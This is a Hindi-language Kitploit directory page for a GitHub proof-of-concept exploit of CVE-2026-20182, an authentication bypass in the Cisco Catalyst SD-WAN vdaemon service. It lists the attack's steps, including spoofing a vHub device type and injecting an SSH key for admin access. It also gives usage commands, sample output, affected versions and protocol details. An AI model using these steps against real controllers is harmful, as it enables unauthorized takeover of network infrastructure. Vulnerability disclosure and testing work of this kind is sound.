Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-20182 — CVE-2026-20182 PoC - Cisco Catalyst SD-WAN नियंत्रक/प्रबंधक प्रमाणीकरण बाईपास (CVSS 10.0) | Kitploit
उपकरण/GitHubGitHub/portbuster1337/cve-2026-20182
शोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगक्लाउड सुरक्षाप्रमाणीकरणरेड टीमिंग
GitHubportbuster1337/cve-2026-20182

CVE-2026-20182

CVE-2026-20182 PoC - Cisco Catalyst SD-WAN नियंत्रक/प्रबंधक प्रमाणीकरण बाईपास (CVSS 10.0)

रिपॉजिटरी देखें
3104 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-20182 — Cisco Catalyst SD-WAN नियंत्रक / प्रबंधक प्रमाणीकरण उपेक्षा

CVE-2026-20182 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cisco Catalyst SD-WAN नियंत्रक (vSmart) और प्रबंधक (vManage) पर vdaemon DTLS सेवा (UDP/12346) में एक गंभीर (CVSS 10.0) प्रमाणीकरण उपेक्षा है।

प्रकटीकरण: 14 मई 2026 Rapid7 (Stephen Fewer & Jonah Burgess) द्वारा
CISA KEV: 14 मई 2026 को जोड़ा गया (आपातकालीन निर्देश 26-03)
CVSS: 10.0 — CWE-287: अनुचित प्रमाणीकरण

भेद्यता

vdaemon सेवा नियंत्रण-प्लेन पीयर्स को प्रमाणित करने के लिए एक बहु-चरणीय DTLS हैंडशेक का उपयोग करती है। vbond_proc_challenge_ack() फ़ंक्शन डिवाइस-प्रकार-विशिष्ट प्रमाणपत्र सत्यापन लागू करता है — लेकिन डिवाइस प्रकार 2 (vHub) में कोई सत्यापन कोड पथ नहीं है। device_type=2 के साथ CHALLENGE_ACK भेजने से फ़ंक्शन हर शर्त को विफल कर देता है और बिना शर्त peer->authenticated = 1 सेट कर देता है।

किसी वैध क्रेडेंशियल, CA-हस्ताक्षरित प्रमाणपत्र, या SD-WAN तैनाती के ज्ञान की आवश्यकता नहीं है।

एक्सप्लॉइट क्या करता है

  1. लक्ष्य की vdaemon सेवा (UDP/12346) से DTLS 1.2 कनेक्शन स्थापित करता है
  2. CHALLENGE संदेश (msg_type=8) प्राप्त करता है
  3. vHub (device_type=2) होने का दावा करते हुए CHALLENGE_ACK भेजता है → पीयर प्रमाणित के रूप में चिह्नित होता है
  4. HELLO (msg_type=5) भेजता है → पीयर UP स्थिति में परिवर्तित होता है
  5. MSG_VMANAGE_TO_PEER (msg_type=14) के माध्यम से /home/vmanage-admin/.ssh/authorized_keys में एक SSH सार्वजनिक कुंजी इंजेक्ट करता है
  6. vmanage-admin के रूप में NETCONF पहुंच (SSH TCP/830) या SSH पहुंच (TCP/22) प्रदान करता है

उपयोग

python3 cve-2026-20182.py -t <target> [options]

विकल्प

तर्कविवरण
-t, --targetलक्ष्य IP या होस्टनाम
--portvdaemon UDP पोर्ट (डिफ़ॉल्ट: 12346)
--key-fileइंजेक्ट करने के लिए मौजूदा SSH सार्वजनिक कुंजी का पथ (वैकल्पिक)
--netconfSSH के माध्यम से NETCONF से जुड़कर शोषण सत्यापित करें

उदाहरण

# एक नई कुंजी जोड़ी उत्पन्न करें और शोषण करें
python3 cve-2026-20182.py -t 192.168.1.100

# मौजूदा सार्वजनिक कुंजी का उपयोग करें
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub

# शोषण करें और NETCONF के माध्यम से सत्यापित करें
python3 cve-2026-20182.py -t 192.168.1.100 --netconf

आउटपुट

[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...

[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]

प्रभावित संस्करण

रिलीज़नियत संस्करण
< 20.9समर्थित रिलीज़ पर माइग्रेट करें
20.920.9.9.1
20.1020.12.7.1
20.1120.12.7.1
20.1220.12.5.4 / 20.12.6.2 / 20.12.7.1
20.1320.15.5.2
20.1420.15.5.2
20.1520.15.4.4 / 20.15.5.2
20.1620.18.2.2
20.1820.18.2.2
26.1.126.1.1.1

अनुसंधान संदर्भ

  • Rapid7 (मूल प्रकटीकरण): CVE-2026-20182: Cisco Catalyst SD-WAN नियंत्रक में गंभीर प्रमाणीकरण उपेक्षा — Stephen Fewer और Jonah Burgess द्वारा पूर्ण तकनीकी विश्लेषण, डीकंपाइल्ड कोड और प्रोटोकॉल विवरण
  • Cisco सुरक्षा सलाह: cisco-sa-sdwan-rpa2-v69WY2SW — नियत संस्करणों के साथ विक्रेता सलाह
  • CISA KEV: CVE-2026-20182 — आपातकालीन निर्देश 26-03 (17 मई 2026 तक उपचार)
  • NVD: CVE-2026-20182 — राष्ट्रीय भेद्यता डेटाबेस प्रविष्टि
  • Rapid7 Metasploit मॉड्यूल: cisco_sdwan_vhub_auth_bypass — Metasploit फ्रेमवर्क में सहायक मॉड्यूल
  • BleepingComputer: Cisco ने जीरो-डे हमलों में शोषित नई गंभीर SD-WAN खामी की चेतावनी दी
  • Tenable: Cisco SD-WAN भेद्यताओं के निरंतर शोषण के बारे में FAQ
  • Cisco Talos: खतरा अभिनेता UAT-8616 को वास्तविक दुनिया में इस भेद्यता का शोषण करने का श्रेय

तकनीकी विवरण

vdaemon प्रोटोकॉल हेडर 12 बाइट्स का है:

ऑफसेटआकारफील्डनोट्स
01msg_typeनिम्न निबल = प्रकार, उच्च निबल = संस्करण
11device_infoउच्च निबल = device_type, निम्न निबल = फ्लैग्स
21flagsमानक मान 0xA0
31पैडिंगहमेशा 0x00
4-74domain_idबिग-एंडियन uint32
8-114site_idबिग-एंडियन uint32

डिवाइस प्रकार: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage

आवश्यकताएँ

  • Python 3.7+
  • openssl CLI (DTLS परिवहन के लिए)
  • cryptography लाइब्रेरी (pip install cryptography)

अस्वीकरण

यह एक्सप्लॉइट केवल अधिकृत रेड टीम संचालन, पैठ परीक्षण, और उन सिस्टमों पर सुरक्षा अनुसंधान के लिए है जहाँ आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत उपयोग अवैध है।

टूल डाउनलोड करें